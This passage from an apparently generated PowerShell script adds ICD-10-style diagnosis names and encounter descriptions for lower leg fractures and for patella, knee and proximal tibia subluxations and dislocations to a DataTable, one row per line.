encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of left lower leg","Other fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Other fracture of unspecified lower leg","Other fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of unspecified lower leg","Unspecified fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of right lower leg","Unspecified fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Unspecified fracture of left lower leg","Unspecified fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right patella","Unspecified subluxation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right patella","Unspecified subluxation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right patella","Unspecified subluxation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left patella","Unspecified subluxation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left patella","Unspecified subluxation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left patella","Unspecified subluxation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified patella","Unspecified subluxation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified patella","Unspecified subluxation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified patella","Unspecified subluxation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right patella","Unspecified dislocation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right patella","Unspecified dislocation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right patella","Unspecified dislocation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left patella","Unspecified dislocation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left patella","Unspecified dislocation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left patella","Unspecified dislocation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified patella","Unspecified dislocation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified patella","Unspecified dislocation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified patella","Unspecified dislocation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right patella","Lateral subluxation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right patella","Lateral subluxation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of right patella","Lateral subluxation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left patella","Lateral subluxation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left patella","Lateral subluxation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of left patella","Lateral subluxation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified patella","Lateral subluxation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified patella","Lateral subluxation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of unspecified patella","Lateral subluxation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right patella","Lateral dislocation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right patella","Lateral dislocation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of right patella","Lateral dislocation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left patella","Lateral dislocation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left patella","Lateral dislocation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of left patella","Lateral dislocation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified patella","Lateral dislocation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified patella","Lateral dislocation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of unspecified patella","Lateral dislocation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right patella","Other subluxation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right patella","Other subluxation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right patella","Other subluxation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left patella","Other subluxation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left patella","Other subluxation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left patella","Other subluxation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified patella","Other subluxation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified patella","Other subluxation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified patella","Other subluxation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right patella","Other dislocation of right patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right patella","Other dislocation of right patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right patella","Other dislocation of right patella, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left patella","Other dislocation of left patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left patella","Other dislocation of left patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left patella","Other dislocation of left patella, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified patella","Other dislocation of unspecified patella, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified patella","Other dislocation of unspecified patella, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of unspecified patella","Other dislocation of unspecified patella, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right knee","Unspecified subluxation of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right knee","Unspecified subluxation of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of right knee","Unspecified subluxation of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left knee","Unspecified subluxation of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left knee","Unspecified subluxation of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of left knee","Unspecified subluxation of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified knee","Unspecified subluxation of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified knee","Unspecified subluxation of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified subluxation of unspecified knee","Unspecified subluxation of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right knee","Unspecified dislocation of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right knee","Unspecified dislocation of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of right knee","Unspecified dislocation of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left knee","Unspecified dislocation of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left knee","Unspecified dislocation of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of left knee","Unspecified dislocation of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified knee","Unspecified dislocation of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified knee","Unspecified dislocation of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Unspecified dislocation of unspecified knee","Unspecified dislocation of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, right knee","Anterior subluxation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, right knee","Anterior subluxation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, right knee","Anterior subluxation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, left knee","Anterior subluxation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, left knee","Anterior subluxation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, left knee","Anterior subluxation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, unspecified knee","Anterior subluxation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, unspecified knee","Anterior subluxation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior subluxation of proximal end of tibia, unspecified knee","Anterior subluxation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, right knee","Anterior dislocation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, right knee","Anterior dislocation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, right knee","Anterior dislocation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, left knee","Anterior dislocation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, left knee","Anterior dislocation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, left knee","Anterior dislocation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, unspecified knee","Anterior dislocation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, unspecified knee","Anterior dislocation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Anterior dislocation of proximal end of tibia, unspecified knee","Anterior dislocation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, right knee","Posterior subluxation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, right knee","Posterior subluxation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, right knee","Posterior subluxation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, left knee","Posterior subluxation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, left knee","Posterior subluxation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, left knee","Posterior subluxation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, unspecified knee","Posterior subluxation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, unspecified knee","Posterior subluxation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior subluxation of proximal end of tibia, unspecified knee","Posterior subluxation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, right knee","Posterior dislocation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, right knee","Posterior dislocation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, right knee","Posterior dislocation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, left knee","Posterior dislocation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, left knee","Posterior dislocation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, left knee","Posterior dislocation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, unspecified knee","Posterior dislocation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, unspecified knee","Posterior dislocation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Posterior dislocation of proximal end of tibia, unspecified knee","Posterior dislocation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, right knee","Medial subluxation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, right knee","Medial subluxation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, right knee","Medial subluxation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, left knee","Medial subluxation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, left knee","Medial subluxation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, left knee","Medial subluxation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, unspecified knee","Medial subluxation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, unspecified knee","Medial subluxation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial subluxation of proximal end of tibia, unspecified knee","Medial subluxation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, right knee","Medial dislocation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, right knee","Medial dislocation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, right knee","Medial dislocation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, left knee","Medial dislocation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, left knee","Medial dislocation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, left knee","Medial dislocation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, unspecified knee","Medial dislocation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, unspecified knee","Medial dislocation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Medial dislocation of proximal end of tibia, unspecified knee","Medial dislocation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, right knee","Lateral subluxation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, right knee","Lateral subluxation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, right knee","Lateral subluxation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, left knee","Lateral subluxation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, left knee","Lateral subluxation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, left knee","Lateral subluxation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, unspecified knee","Lateral subluxation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, unspecified knee","Lateral subluxation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral subluxation of proximal end of tibia, unspecified knee","Lateral subluxation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, right knee","Lateral dislocation of proximal end of tibia, right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, right knee","Lateral dislocation of proximal end of tibia, right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, right knee","Lateral dislocation of proximal end of tibia, right knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, left knee","Lateral dislocation of proximal end of tibia, left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, left knee","Lateral dislocation of proximal end of tibia, left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, left knee","Lateral dislocation of proximal end of tibia, left knee, sequela") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, unspecified knee","Lateral dislocation of proximal end of tibia, unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, unspecified knee","Lateral dislocation of proximal end of tibia, unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Lateral dislocation of proximal end of tibia, unspecified knee","Lateral dislocation of proximal end of tibia, unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of right knee","Other subluxation of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right knee","Other subluxation of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of right knee","Other subluxation of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of left knee","Other subluxation of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left knee","Other subluxation of left knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of left knee","Other subluxation of left knee, sequela") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified knee","Other subluxation of unspecified knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified knee","Other subluxation of unspecified knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other subluxation of unspecified knee","Other subluxation of unspecified knee, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of right knee","Other dislocation of right knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right knee","Other dislocation of right knee, subsequent encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of right knee","Other dislocation of right knee, sequela") + $null = $DiagnosisList.Rows.Add("Other dislocation of left knee","Other dislocation of left knee, initial encounter") + $null = $DiagnosisList.Rows.Add("Other dislocation of left knee","Other 